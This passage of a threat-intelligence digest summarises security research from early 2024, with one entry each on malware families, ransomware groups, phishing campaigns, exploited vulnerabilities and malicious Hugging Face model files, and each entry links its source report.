Summary:: The article discusses a recent attack on WordPress websites, where infected websites are used to launch a distributed brute force attack to guess passwords for other third-party sites. The attackers then visit the target sites to download valid credentials. The article provides statistics and tips for mitigating the risk of such attacks, as well as a new development in website hacks involving Web3 crypto wallet drainers. It also explains the process of uploading encrypted credentials and the different stages of the attack. The article concludes by offering assistance for those who believe their website may be infected.

Source: https://blog.sucuri.net/2024/03/from-web3-drainer-to-distributed-wordpress-brute-force-attack.html

Intel Source:: ASEC

Intel Name:: WebLogic_Server_Exploited_by_z0Miner

Date of Scan:: 2024-03-06

Impact:: LOW

Summary:: Researchers from ASEC have discovered multiple instances of threat actors targeting weak Korean servers. The following report describes a recent incident involving an attack against Korean WebLogic servers by the threat actor "z0Miner."

Source: https://asec.ahnlab.com/en/62564/

Intel Source:: Cyfirma Research

Intel Name:: An_Extremely_Harmful_Malware_WinDestroyer

Date of Scan:: 2024-03-05

Impact:: LOW

Summary:: Researchers from CYFIRMA have discovered WinDestroyer, a harmful malware. The ransomware does not seek a ransom, indicating that it is not motivated by money. This advanced threat uses sophisticated tactics to render systems unusable, including lateral movement capabilities, API hammering, and DLL reload attacks.

Source: https://www.linkedin.com/posts/cyfirma-research-6a8073245_windestroyer-and-its-origin-activity-7170733140540346368-Rmvc?utm_source=li_share&utm_content=feedcontent&utm_medium=g_dt_web&utm_campaign=copy

Intel Source:: Fortinet

Intel Name:: CHAVECLOAKS_Targeting_Brazilians_via_Malicious_PDFs

Date of Scan:: 2024-03-05

Impact:: MEDIUM

Summary:: Fortinet researchers have found CHAVECLOAK, a high-severity Trojan that targeting Brazilian bank customers. The malware targets Windows devices and gains access to online banking services, taking financial data and banking credentials with it.

Source: https://www.fortinet.com/blog/threat-research/banking-trojan-chavecloak-targets-brazil

Intel Source:: Double Agent

Intel Name:: A_novel_backdoor_GTPDOOR

Date of Scan:: 2024-03-05

Impact:: LOW

Summary:: GTPDOOR is Linux malware that communicates C2 traffic over GTP-C signaling messages, blending in with normal telco traffic. It can execute commands sent in GTP echo requests and probe hosts covertly via TCP packets. Versions target x86 and i386 architectures.

Source: https://doubleagent.net/telecommunications/backdoor/gtp/2024/02/27/GTPDOOR-COVERT-TELCO-BACKDOOR

Intel Source:: Cert.360

Intel Name:: New_variant_of_SupermanMiner_mining_malware

Date of Scan:: 2024-03-05

Impact:: LOW

Summary:: A new variant of the SupermanMiner cryptocurrency mining malware has been active for over 2 years, using techniques like vulnerability exploitation, SSH brute force, web shell injection and others to infect systems. It has evolved into multiple new branches, with heavy obfuscation and complex persistence mechanisms, posing a serious threat. Users should apply security patches, use strong passwords, and limit external access to prevent infection.

Source: https://cert.360.cn/warning/detail?id=65deee7fc09f255b91b17e0f

Intel Source:: NS Focus Global

Intel Name:: The_security_threats_from_malicious_machine_learning_models

Date of Scan:: 2024-03-05

Impact:: LOW

Summary:: The article discusses the potential security threats posed by malicious machine learning (ML) models on the Hugging Face platform. It provides background information on a recent report that found some ML models on Hugging Face may be used to attack the user environment, leading to code execution and providing attackers with full control of the infected machine. The affected models, specifically the baller423/goober2 model, are discussed in detail, along with a technical analysis of how they work and how they can be loaded and executed. The article also highlights the potential risks associated with PyTorch and Tensorflow models. It concludes with mitigation methods, such as using Hugging Face's new format Safetensors and implementing security measures like malware and Pickle scanning. The article emphasizes the importance of thorough scrutiny and safety measures when dealing with ML models from untrusted sources and the urgency of AI model security.

Source: https://nsfocusglobal.com/ai-supply-chain-security-hugging-face-malicious-ml-models/

Intel Source:: Cisco Talos

Intel Name:: A_surge_of_new_GhostLocker_2_ransomware_by_GhostSec_threat_group

Date of Scan:: 2024-03-05

Impact:: MEDIUM

Summary:: The article discusses the evolution and joint operation of GhostSec and Stormous, two hacking groups that have collaborated to conduct double extortion attacks using the GhostLocker and StormousX ransomware programs. It provides details on the various versions of GhostLocker, its C2 panels, and the features provided to affiliates. The article also mentions two new tools in GhostSec's arsenal, the GhostSec Deep Scan toolset and GhostPresser, which are used for scanning and attacking legitimate websites. It discusses the groups' focus on raising funds for hacktivists and threat actors and their new ransomware-as-a-service program. The article also provides information on the capabilities of GhostPresser, a tool used to target WordPress websites, and how Cisco Secure Endpoint and other Cisco products can prevent the execution of this malware. It also includes a list of indicators associated with this threat.

Source: https://blog.talosintelligence.com/ghostsec-ghostlocker2-ransomware/

Intel Source:: ASEC

Intel Name:: WogRAT_Malware_Exploiting_aNotepad

Date of Scan:: 2024-03-05

Impact:: LOW

Summary:: Researchers from ASEC have found that backdoor malware is distributed using the free online notepad tool aNotepad. Both the PE format, which targets Windows systems, and the ELF format, which targets Linux systems, are supported by said malware. The malware is categorized as WogRAT since the threat actor uses the string "WingOfGod" when creating it.

Source: https://asec.ahnlab.com/en/62446/

Intel Source:: Cyfirma

Intel Name:: Remcos_RAT_and_Agent_Tesla_Deployed_by_Stego_Campaign

Date of Scan:: 2024-03-05

Impact:: LOW

Summary:: Researchers at Cyfirma have discovered a way to get around standard email security safeguards in a Microsoft Office document by using template injection. Opening the document initiates a multi-stage attack that includes the deployment of the malware known as "Agent Tesla" and the Remcos Remote Access Trojan (RAT), as well as the download and execution of scripts.

Source: https://www.cyfirma.com/outofband/exploiting-document-templates-stego-campaign-deploying-remcos-rat-and-agent-tesla/

Intel Source:: Trend Micro

Intel Name:: A_Multistage_Ransomware_Attack_Using_RA_World

Date of Scan:: 2024-03-04

Impact:: MEDIUM

Summary:: Researchers at Trend Micro have discovered a multi-stage attack known as RA World, which is aimed against multiple healthcare organizations in the Latin American region. The attack's goal is to maximize the group's operational impact and success.

Source: https://www.trendmicro.com/en_us/research/24/c/multistage-ra-world-ransomware.html

Intel Source:: Proofpoint

Intel Name:: TA577_Cyber_Threat_Unmasked

Date of Scan:: 2024-03-04

Impact:: LOW

Summary:: Proofpoint Researchers Uncover New Attack Chain by Cyber Threat Actor TA577, Focused on Uncommon NT LAN Manager (NTLM) Authentication Information Theft. Two Campaigns Detected on 26 and 27 February 2024, Targeting Hundreds of Global Organizations through Thread Hijacking with Zipped HTML Attachments.

Source: https://www.proofpoint.com/us/blog/threat-insight/ta577s-unusual-attack-chain-leads-ntlm-data-theft

Intel Source:: Cleafy

Intel Name:: A_recent_Copybara_fraud_campaign

Date of Scan:: 2024-03-04

Impact:: LOW

Summary:: The article discusses the rising threat of On-Device Fraud (ODF) in the banking sector, which involves fraudulent activities initiated directly on the victim's device. It focuses on a recent Copybara fraud campaign and explains the use of remote control capabilities by malware to execute ODF scenarios. The article also provides an overview of phishing panels and the Copybara botnet's associated C2 web panel. It describes the functionalities of the panel, including the ability to remotely control infected devices, steal credentials, and send fake push notifications. The article concludes by emphasizing the need for collaboration and innovation in combating ODF and other forms of banking fraud.

Source: https://www.cleafy.com/cleafy-labs/on-device-fraud-on-the-rise-exposing-a-recent-copybara-fraud-campaign

Intel Source:: Lookout

Intel Name:: Advanced_Phishing_Kit_Targeting_Cryptocurrency_Platforms_and_FCC

Date of Scan:: 2024-03-04

Impact:: LOW

Summary:: Lookout researchers have identified an innovative phishing kit employing unique strategies to target both cryptocurrency platforms and the Federal Communications Commission (FCC) through mobile devices. Modeled after the techniques used by groups like Scattered Spider, this kit allows attackers to replicate single sign-on (SSO) pages. Subsequently, they employ a blend of email, SMS, and voice phishing to deceive targets into divulging usernames, passwords, password reset URLs, and even photo IDs from numerous victims, predominantly in the United States.

Source: https://www.lookout.com/threat-intelligence/article/cryptochameleon-fcc-phishing-kit

Intel Source:: Sucuri

Intel Name:: New_Wave_of_SocGholish_Infections

Date of Scan:: 2024-03-04

Impact:: LOW

Summary:: The article discusses a new wave of SocGholish malware infections that are targeting WordPress websites. These malicious plugins are being uploaded to compromised websites and contain code that injects SocGholish payloads onto the site. The article provides examples of different plugins that have been modified to include this code and explains how the code is executed. It also mentions the TDS domains that are being used to host the SocGholish scripts and the recent registration dates of these domains. The article emphasizes the responsibility of website owners to keep their websites secure and provides tips for website owners to prevent the distribution of malware. It also warns against downloading software updates from unofficial sources and offers assistance for those who may have fallen victim to malware. The article also discusses the similarities between criminal organizations behind cyber attacks and regular IT companies. It highlights the importance of website visitors being vigilant and avoiding clicking on suspicious links. The article also warns against downloading software updates from unofficial sources and offers assistance for those who may have fallen victim to malware. The article concludes by emphasizing the importance of protecting websites from these types of attacks and provides information on the techniques used by attackers, such as "domain shadowing" and gaining access through compromised credentials.

Source: https://blog.sucuri.net/2024/03/new-wave-of-socgholish-infections-impersonates-wordpress-plugins.html

Intel Source:: Recorded Future

Intel Name:: The_use_of_spyware_Predator_poses_significant_risks

Date of Scan:: 2024-03-04

Impact:: LOW

Summary:: Recorded Future's Insikt Group has observed new activity related to the operators of Predator, a mercenary mobile spyware. Spyware like Predator poses significant privacy, legality, and physical safety risks, especially when used outside serious crime and counterterrorism contexts. The Insikt Group's research found out about a new multi-tiered Predator delivery infrastructure, with evidence from domain analysis and network intelligence data.

Source: https://www.recordedfuture.com/predator-spyware-operators-rebuild-multi-tier-infrastructure-target-mobile-devices

Intel Source:: Sonatype

Intel Name:: The_spread_of_Bladeroid_crypto_stealer_thru_npm_packages

Date of Scan:: 2024-03-01

Impact:: LOW

Summary:: Sonatype has identified multiple open source packages named sniperv1, and sniperv2, among others that infect npm developers with a Windows info-stealer and crypto-stealer called 'Bladeroid.' The info-stealer can be seen peeking into a user's browser cookies and local storage data and attempting to steal saved (auto-fill) form data. The info-stealer can be seen peeking into a user's browser cookies and local storage data and attempting to steal saved (auto-fill) form data.

Source: https://blog.sonatype.com/npm-packages-caught-spreading-bladeroid-info-stealer

Intel Source:: ISC.SANS

Intel Name:: The_DarkGate_Model_For_Malware_Delivery_and_Persistence

Date of Scan:: 2024-03-01

Impact:: LOW

Summary:: ISC.SANS researchers have examined a typical phishing PDF, which resulted in the delivery of a far more dubious MSI signed with a legitimate code signing certificate and having an unexpectedly low signature-based detection rate on VirusTotal because of the utilization of multiple layered stages.

Source: https://isc.sans.edu/diary/rss/30700

Intel Source:: CISA

Intel Name:: Active_Exploitation_of_Ivanti_Gateway_Vulnerabilities

Date of Scan:: 2024-03-01

Impact:: MEDIUM

Summary:: The Integrity Checker Tool (ICT) can be tricked into giving the impression of false security, according to a new cybersecurity advice from the Five Eyes intelligence alliance. Cyber threat actors are taking advantage of known security holes in the Ivanti Connect Secure and Ivanti Policy Secure gateways. Despite doing factory resets, a cyber threat actor may still be able to obtain root-level persistence, and Ivanti ICT is insufficient to identify penetration. Since January 10, 2024, Ivanti has published five security flaws affecting their products. Of those, four are now being actively exploited by various threat actors to spread malware.

Source: https://www.cisa.gov/sites/default/files/2024-02/AA24-060B-Threat-Actors-Exploit-Multiple-Vulnerabilities-in-Ivanti-Connect-Secure-and-Policy-Secure-Gateways_0.pdf

Intel Source:: Malwarebytes

Intel Name:: Airbnb_scam

Date of Scan:: 2024-03-01

Impact:: LOW

Summary:: The scammers send people emails that claim to be from Tripadvisor with some links, but more alarm bells were triggered when the sender email showed up as support@mailerfx.com — not exactly the email address you’d expect from Tripadvisor itself. The scammer hoped people would click on the booking button on the fake Tripadvisor site. If they had done, they would have seen a prompt to register with ‘Tripadvisor’.

Source: https://www.malwarebytes.com/blog/news/2024/02/airbnb-scam-sends-you-to-a-fake-tripadvisor-site-takes-your-money

Intel Source:: ISC.SANS

Intel Name:: Exploring_Confluence_CVE_2022_26134

Date of Scan:: 2024-03-01

Impact:: LOW

Summary:: Researchers from ISC SANS have added daemonlogger to capture packets and Arkime to view the packets that my DShield sensor captured. They noticed that, up until now, this activity had only gone to TCP/8090, which is base64 encoded and contains URLs. On February 12, 2024, the DShield sensor began recording this behavior as it came in from different IPs in different places.

Source: https://isc.sans.edu/diary/Scanning+for+Confluence+CVE202226134/30704/

Intel Source:: PaloAlto

Intel Name:: Bifrost_New_Tactics_of_Domain_Deception

Date of Scan:: 2024-03-01

Impact:: MEDIUM

Summary:: Researchers from Palo Alto have discovered a novel Linux version of Bifrost, also known as Bifrose, which demonstrates a creative way to avoid discovery. It makes use of a phony domain that imitates the official VMware domain. The goal of the most recent version of Bifrost is to sneak past security safeguards and infiltrate specific systems.

Source: https://unit42.paloaltonetworks.com/new-linux-variant-bifrost-malware/

Intel Source:: The Hackers news, Phylum

Intel Name:: North_Korean_threat_actors_attacking_developers_with_suspicious_npm_packages

Date of Scan:: 2024-03-01

Impact:: LOW

Summary:: Phylum in their blog explained the deep details of an npm package pretending as a code profiler that installs several malicious scripts including a cryptocurrency and credential stealer. And the hacker tried to hide the malicious code in a test file,

Source: https://thehackernews.com/2024/02/north-korean-hackers-targeting.html https://blog.phylum.io/smuggling-malware-in-test-code/

Intel Source:: Krebsonsecurity

Intel Name:: Spread_Mac_Malware_thru_Calendar_Meeting_Links

Date of Scan:: 2024-02-29

Impact:: LOW

Summary:: Malicious hackers are attacking customers in cryptocurrency in attacks that start with a link added to the target’s calendar at Calendly, an application for scheduling appointments and meetings. The attackers duplicated established cryptocurrency investors and asked to schedule a video conference call. But clicking the meeting link provided by the scammers prompts the user to run a script that quietly installs malware on macOS systems.

Source: https://krebsonsecurity.com/2024/02/calendar-meeting-links-used-to-spread-mac-malware/

Intel Source:: Hunt

Intel Name:: The_Lazarus_group_targets_blockchain_community

Date of Scan:: 2024-02-29

Impact:: MEDIUM

Summary:: Hunt is tracking an ongoing sophisticated phishing campaign targeting individuals in the Telegram groups focused on the blockchain and angel investing communities, specifically entrepreneurs. The tactics described below are strikingly similar to those previously attributed to the Lazarus Group, a North Korean state-sponsored threat actor.

Source: https://hunt.io/blog/suspected-north-korean-hackers-target-blockchain-community-via-telegram

Intel Source:: CISA

Intel Name:: The_Phobos_ransomware_variants

Date of Scan:: 2024-02-29

Impact:: MEDIUM

Summary:: The FBI, the CISA, and MS-ISAC are releasing this joint CSA, to disseminate known TTPs and IOCs associated with the Phobos ransomware variants observed as recently as February 2024, according to open source reporting. Phobos is structured as a ransomware-as-a-service (RaaS) model. Since May 2019, Phobos ransomware incidents impacting state, local, tribal, and territorial (SLTT) governments have been regularly reported to the MS-ISAC. These incidents targeted municipal and county governments, emergency services, education, public healthcare, and other critical infrastructure entities to successfully ransom several million U.S. dollars

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-060a

Intel Source:: Checkpoint

Intel Name:: The_Escalation_of_Web_API_Cyber_Attacks_this_year

Date of Scan:: 2024-02-29

Impact:: LOW

Summary:: The landscape of cyber security is continuously evolving, with Web Application Programming Interfaces (APIs) becoming a focal point for cyber attackers. APIs, which facilitate communication between different software applications, present a broader attack surface than traditional web applications. This exposure is due to the inherent vulnerabilities within Web APIs that can lead to authentication bypasses, unauthorized data access, and a range of malicious activities.

Source: https://blog.checkpoint.com/research/a-shadowed-menace-the-escalation-of-web-api-cyber-attacks-in-2024/

Intel Source:: Zscaler

Intel Name:: SPIKEDWINE_With_WINELOADER_Targets_European_Diplomats

Date of Scan:: 2024-02-29

Impact:: MEDIUM

Summary:: Researchers at Zscaler have found a suspicious PDF file that was posted to VirusTotal on January 30, 2024, from Latvia. Disguised as a letter from the Indian ambassador, this PDF file invites ambassadors to a wine tasting in February 2024. Additionally, the PDF contained a link to a fictitious questionnaire that starts the infection chain by sending users to a malicious ZIP archive housed on a compromised website. They found another similar PDF file uploaded to VirusTotal from Latvia in July 2023 after conducting additional threat research.

Source: https://www.zscaler.com/blogs/security-research/european-diplomats-targeted-spikedwine-wineloader

Intel Source:: Hunter

Intel Name:: Affiliate_TTPs_For_BlackCat_Ransomware

Date of Scan:: 2024-02-29

Impact:: HIGH

Summary:: In less than three minutes, the threat actor was able to download a copy of the ransomware executable to the endpoint through the second identified ScreenConnect instance. In response to the file being quarantined, the threat actor temporarily disabled Windows Defender before downloading the executable file once more and successfully launching it.

Source: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps

Intel Source:: McAfee Labs

Intel Name:: GUloader_Encryption_Strategies_Unmasked

Date of Scan:: 2024-02-29

Impact:: LOW

Summary:: McAfee researchers have discovered that GUloader is now exposed, decrypting the threat posed by malicious SVG files. GUloader utilizes dynamic structural changes, employing polymorphic code and encryption to effectively hide from antivirus software and intrusion detection systems.

Source: https://www.mcafee.com/blogs/other-blogs/mcafee-labs/guloader-unmasked-decrypting-the-threat-of-malicious-svg-files/

Intel Source:: Infloblox

Intel Name:: Savvy_Seahorse_tricks_victims_to_fake_investment_platforms

Date of Scan:: 2024-02-29

Impact:: LOW

Summary:: Savvy Seahorse is a DNS threat actor who convinces victims to create accounts on fake investment platforms, make deposits to a personal account, and then transfers those deposits to a bank in Russia. This actor uses Facebook ads to lure users into their websites and ultimately enroll in fake investment platforms. The campaign themes often involve spoofing well-known companies like Tesla, Facebook/Meta, and Imperial Oil, among others.

Source: https://blogs.infoblox.com/cyber-threat-intelligence/beware-the-shallow-waters-savvy-seahorse-lures-victims-to-fake-investment-platforms-through-facebook-ads/

Intel Source:: Malwarebytes

Intel Name:: Malvertising_Continues_to_Drop_Rhadamanthys

Date of Scan:: 2024-02-29

Impact:: LOW

Summary:: The first time the Rhadamanthys stealer was spotted in public, it was transmitted through malicious advertisements just over a year ago. Malwarebytes researchers have seen a persistence of software download-related malvertising chains in 2023.

Source: https://www.malwarebytes.com/blog/threat-intelligence/2024/02/one-year-later-rhadamanthys-is-still-dropped-via-malvertising

Intel Source:: PaloAlto

Intel Name:: Possible_Imposter_Ransomware_Impersonating_LOCKBIT_4

Date of Scan:: 2024-02-28

Impact:: HIGH

Summary:: There is a lot of interest in LockBit 4.0 now that it is back online following its disruption in February 2024. Similar to others, PaloAlto researchers have discovered potential imposters using the Lockbit 4.0 identity on VirusTotal.

Source: https://twitter.com/Unit42_Intel/status/1762570867291070880

Intel Source:: Bitdefender

Intel Name:: Cactus_ransomware_attack_on_corporate_networks

Date of Scan:: 2024-02-28

Impact:: MEDIUM

Summary:: Bitdefender Labs recently did an investigation that led to the predictions of the growing risk of ransomware attacks. This attack was orchestrated by the threat actor CACTUS, who began by exploiting a software vulnerability less than 24 hours after its initial disclosure. Bitdefender sees it as a commonly known Remote Code Execution (RCE) proof-of-concept (POC) that remains unaddressed for over 24 hours. They suspect that the systems have been compromised with a web shell.

Source: https://www.bitdefender.com/blog/businessinsights/cactus-analyzing-a-coordinated-ransomware-attack-on-corporate-networks/

Intel Source:: Mandiant

Intel Name:: Iranian_Threat_Actor_UNC1549_Targets_Israeli_and_Middle_East_Aerospace_and_Defense_Sectors

Date of Scan:: 2024-02-28

Impact:: MEDIUM

Summary:: Mandiant shared their blog post about suspected Iran espionage activity attacking the aerospace, aviation, and defense industries in Middle Eastern countries, including Israel and the United Arab Emirates (UAE) and possibly Turkey, India, and Albania. Mandiant links this activity with some confidence to the Iranian actor UNC1549, which overlaps with Tortoiseshell—a threat actor that has been publicly linked to Iran’s Islamic Revolutionary Guard Corps (IRGC).

Source: https://www.mandiant.com/resources/blog/suspected-iranian-unc1549-targets-israel-middle-east

Intel Source:: Bitdefender

Intel Name:: New_Variant_of_Atomic_Stealer_in_the_wild

Date of Scan:: 2024-02-28

Impact:: MEDIUM

Summary:: During some investigations, the Bitdefender team was able to isolate multiple suspicious and undetected macOS disk image files that were surprisingly small for files of this kind (1.3 MB per file). The new variant drops and uses a Python script to stay covert. The malware also shares a similar code with the RustDoor backdoor.

Source: https://www.bitdefender.com/blog/labs/when-stealers-converge-new-variant-of-atomic-stealer-in-the-wild/

Intel Source:: Palo Alto

Intel Name:: Exploring_DLL_Hijacking

Date of Scan:: 2024-02-28

Impact:: MEDIUM

Summary:: Unit 42 Palo Alto explained in their article how threat actors use DLL hijacking in malware attacks. It also shares ideas for how to better detect DLL hijacking and best practices on how to reduce the risk of attack. Dynamic-link library (DLL) hijacking is one of the oldest techniques that both threat actors and offensive security professionals continue to use today.

Source: https://unit42.paloaltonetworks.com/dll-hijacking-techniques/#post-132679-_ydqdbjg0dngh

Intel Source:: IC3

Intel Name:: MooBot_Threat_Detected_on_Ubiquiti_EdgeRouters

Date of Scan:: 2024-02-28

Impact:: MEDIUM

Summary:: In a new joint advisory, cybersecurity and intelligence agencies from the U.S. and other countries are urging users of Ubiquiti EdgeRouter to take protective measures, weeks after a botnet comprising infected routers was felled by law enforcement as part of an operation codenamed Dying Ember. The MooBot botnet is being utilized by APT28, a threat actor associated with Russia, to enable clandestine cyber operations and disseminate personalized malware for subsequent exploitation. Connected to the Russian Federation's Main Directorate of the General Staff (GRU), APT28 has been operational since at least 2007.

Source: https://www.ic3.gov/Media/News/2024/240227.pdf

Intel Source:: Mandiant

Intel Name:: Ivanti_Connect_Secure_VPN_Vulnerabilities_Exploited_by_China_Linked_Threat_Actors

Date of Scan:: 2024-02-28

Impact:: LOW

Summary:: This article explores the investigation into the exploitation and persistence attempts of Ivanti Connect Secure VPN vulnerabilities in a series called "Cutting Edge, Part 3." Additionally, Mandiant has identified UNC5325 employing living-off-the-land techniques and deploying new malware like LITTLELAMB to enhance evasion of detection.

Source: https://www.mandiant.com/resources/blog/investigating-ivanti-exploitation-persistence

Intel Source:: CISA

Intel Name:: The_ALPHV_Blackcat_ransomware_updates

Date of Scan:: 2024-02-28

Impact:: HIGH

Summary:: The Federal Bureau of Investigation (FBI), the Cybersecurity and Infrastructure Security Agency (CISA), and the Department of Health and Human Services (HHS) are releasing this joint CSA to disseminate known IOCs and TTPs associated with the ALPHV Blackcat ransomware as a service (RaaS) identified through FBI investigations as recently as February 2024.

Source: https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-353a

Intel Source:: JPCert

Intel Name:: Lazarus_new_malicious_PyPI_packages

Date of Scan:: 2024-02-28

Impact:: MEDIUM

Summary:: JPCERT/CC has confirmed that Lazarus has released malicious Python packages to PyPI, the official Python package repository

Source: https://blogs.jpcert.or.jp/en/2024/02/lazarus_pypi.html

Intel Source:: SOC Radar

Intel Name:: The_Dark_Web_Profile_of_Patchwork_APT

Date of Scan:: 2024-02-27

Impact:: LOW

Summary:: The Patchwork APT group is an Indian cyber espionage group that was discovered in December 2015, however it is likely that it has been operating since 2009. Targeting high-profile organizations in South and Southeast Asia, but increasingly expanding to other regions, it primarily targets defense, diplomatic, and government agencies. Patchwork is a prominent threat in the cyber threat landscape because it uses a variety of specialized tools and techniques for espionage, including spear phishing and watering hole attacks.

Source: https://socradar.io/dark-web-profile-patchwork-apt/

Intel Source:: Fortinet

Intel Name:: The_Abyss_Locker_ransomware_roundup_report

Date of Scan:: 2024-02-27

Impact:: MEDIUM

Summary:: FortiGuard Labs monitors and collects data on ransomware variants of interest that have been gaining traction within their datasets and the OSINT community. This time they reported that the ransomware roundup covers the Abyss Locker (AbyssLocker) ransomware.

Source: https://www.fortinet.com/blog/threat-research/ransomware-roundup-abyss-locker

Intel Source:: Huntress

Intel Name:: Adversaries_Exploiting_ScreenConnect_Vulnerability_SlashAndGrab

Date of Scan:: 2024-02-27

Impact:: LOW

Summary:: Huntress has observed a surge in threat actor activity exploiting the ScreenConnect vulnerability dubbed "SlashAndGrab." This article details various post-exploitation tradecraft employed by adversaries, including deploying ransomware (e.g., LockBit), running cryptocurrency miners, installing additional remote access tools (e.g., Simple Help, SSH, Google Chrome Remote Desktop), dropping Cobalt Strike beacons, and establishing persistence through user creation and reverse shell techniques. The article emphasizes the need for continued vigilance and highlights the importance of a proactive and experienced security approach to thwart adversaries.

Source: https://www.huntress.com/blog/slashandgrab-screen-connect-post-exploitation-in-the-wild-cve-2024-1709-cve-2024-1708

Intel Source:: Bitsight

Intel Name:: InstallsKey_PPI_Service_Malware

Date of Scan:: 2024-02-27

Impact:: LOW

Summary:: A new string encryption method and an alternate communication protocol have been added to PrivateLoader, a popular malware downloader. In addition, it is now downloading a duplicate of itself in addition to its other payloads. The commercial packer VMProtect is used to pack recent samples, which makes them more difficult to decipher and reverse engineer.

Source: https://www.bitsight.com/blog/hunting-privateloader-malware-behind-installskey-ppi-service

Intel Source:: Any.Run

Intel Name:: Examining_DCRat_in_Depth

Date of Scan:: 2024-02-27

Impact:: LOW

Summary:: Initially released in 2018, DCrat, also referred to as Dark Crystal RAT, is a remote access trojan (RAT). This malware is modular, meaning it may be altered to carry out various functions. For example, it can take over Steam and Telegram accounts, steal passwords, and get information from cryptocurrency wallets. DCrat can be distributed by attackers in a number of ways, although phishing email operations are the most popular.

Source: https://any.run/malware-trends/dcrat

Intel Source:: Cisco Talos

Intel Name:: TimbreStealer_campaign_targets_Mexican_users

Date of Scan:: 2024-02-27

Impact:: LOW

Summary:: Cisco Talos has discovered a new campaign operated by a threat actor distributing a previously unknown malware we’re calling “TimbreStealer.” This threat actor was observed distributing TimbreStealer via a spam campaign using Mexican tax-related themes starting in at least November 2023. The threat actor has previously used similar tactics, techniques, and procedures (TTPs) to distribute a banking trojan known as “Mispadu.”

Source: https://blog.talosintelligence.com/timbrestealer-campaign-targets-mexican-users/

Intel Source:: The DFIR Report

Intel Name:: The_Gootloader_Tale_Goes_On

Date of Scan:: 2024-02-27

Impact:: LOW

Summary:: Researchers from the DFIR report have discovered an intrusion in February 2023. The intrusion was caused by a user downloading and running a file from an SEO-poisoned search result, which resulted in a Gootloader infection. By using SystemBC to tunnel RDP access into the network, the threat actor was able to compromise backup servers, domain controllers, and other important systems.

Source: https://thedfirreport.com/2024/02/26/seo-poisoning-to-domain-control-the-gootloader-saga-continues/

Intel Source:: Forcepoint

Intel Name:: Agent_Tesla_malware_targets_travel_industry

Date of Scan:: 2024-02-27

Impact:: LOW

Summary:: Forcepoint analysts analyzed one of the Agent Tesla similar campaigns which is delivered via email as a PDF attachment and ends up downloading a RAT leaving the system infected. The email was an example of scamming and brand impersonation where the sender is seeking a refund of a reservation made at Booking.com and asking the recipient to check the attached PDF for the card statement.

Source: https://www.forcepoint.com/blog/x-labs/agent-tesla-malware-attacks-travel-industry

Intel Source:: ASEC

Intel Name:: Phishing_Scripts_Exploit_Telegram_for_User_Information_Theft

Date of Scan:: 2024-02-27

Impact:: MEDIUM

Summary:: AhnLab Security Intelligence Center (ASEC) has identified a surge in phishing scripts utilizing Telegram for the indiscriminate distribution of malicious content, often themed around remittances and receipts. These sophisticated scripts, unlike their predecessors, employ obfuscation techniques to evade detection. Upon interaction, users are prompted to enter a password, enabling threat actors to steal sensitive information, including email addresses and passwords. The stolen data is then transmitted to the attackers via the Telegram API. This method of leveraging Telegram for information theft is becoming increasingly prevalent, emphasizing the importance of vigilance against suspicious files and websites.

Source: https://asec.ahnlab.com/en/62177/

Intel Source:: TrendMicro

Intel Name:: Black_Basta_Exploiting_ScreenConnect_Vulnerabilities

Date of Scan:: 2024-02-27

Impact:: HIGH

Summary:: Researchers from TrendMicro have thoroughly examined the most recent ScreenConnect vulnerabilities. They also talk about how the data led them to identify threat actor groups that are actively using CVE-2024-1708 and CVE-2024-1709, such as the Black Basta and Bl00dy Ransomware gangs.

Source: https://www.trendmicro.com/en_us/research/24/b/threat-actor-groups-including-black-basta-are-exploiting-recent-.html

Intel Source:: Elastic

Intel Name:: The_observed_new_PIKABOT_campaigns

Date of Scan:: 2024-02-27

Impact:: LOW

Summary:: Elastic Security Labs discovered updated new PIKABOT campaigns, including an updated version. PIKABOT is a widely deployed loader malicious actors utilize to distribute additional payloads.

Source: https://www.elastic.co/security-labs/pikabot-i-choose-you

Intel Source:: Morphisec

Intel Name:: New_Version_of_IDAT_Loader_Pushes_Remcos_RAT_with_Steganography

Date of Scan:: 2024-02-27

Impact:: LOW

Summary:: Researchers at Morphisec Threat Labs have found several signs of attacks that led to threat actor UAC-0184. The infamous IDAT loader that sent the Remcos Remote Access Trojan (RAT) to a Ukrainian organization with headquarters in Finland is clarified by this finding.

Source: https://blog.morphisec.com/unveiling-uac-0184-the-remcos-rat-steganography-saga

Intel Source:: Phylum

Intel Name:: NovaStealer_Deployer

Date of Scan:: 2024-02-26

Impact:: LOW

Summary:: The article discusses a recent discovery by the Phylum Research Team of a dormant PyPI package, django-log-tracker, that was updated to deploy the NovaSentinel stealer. The update included malicious code, indicating a calculated strategy by an attacker or a compromise of the PyPI account. The malware was found to be a form of steal-everything-you-can-find, designed to steal sensitive information. The section also highlights the risks of supply-chain attacks through compromised PyPI accounts and urges developers to be cautious when using open-source software.

Source: https://blog.phylum.io/dormant-pypi-package-updated-to-deploy-novasentinel-stealer/

Intel Source:: Bitdefender

Intel Name:: Critical_ConnectWise_ScreenConnect_Authentication_Bypass

Date of Scan:: 2024-02-26

Impact:: HIGH

Summary:: On February 19, 2024, ConnectWise released a security patch addressing two vulnerabilities in the ScreenConnect software, potentially leading to Remote Code Execution (RCE). These vulnerabilities, identified as CVE-2024-1709 and CVE-2024-1708, allow attackers to bypass authentication and perform path traversal, respectively, enabling unauthorized access and administrative privilege escalation.

Source: https://www.bitdefender.com/blog/businessinsights/technical-advisory-critical-connectwise-screenconnect-authentication-bypass/

Intel Source:: NCC Group

Intel Name:: Unmasking_Lorenz_Ransomware

Date of Scan:: 2024-02-26

Impact:: MEDIUM

Summary:: The article discusses the evolving tactics of the ransomware group Lorenz, which has been targeting small to medium businesses globally. The group has recently adopted double-extortion tactics and made changes to their encryption methods and file names. They also use scheduled tasks and local admin accounts for persistence. The article provides indicators of compromise and stresses the need for continuous monitoring to stay protected against ransomware threats.

Source: https://research.nccgroup.com/2024/02/22/unmasking-lorenz-ransomware-a-dive-into-recent-tactics-techniques-and-procedures/

Intel Source:: Trendmicro

Intel Name:: Dissecting_Earth_Luscas_Espionage_Campaign_Leveraging_Geopolitical_Lures

Date of Scan:: 2024-02-26

Impact:: LOW

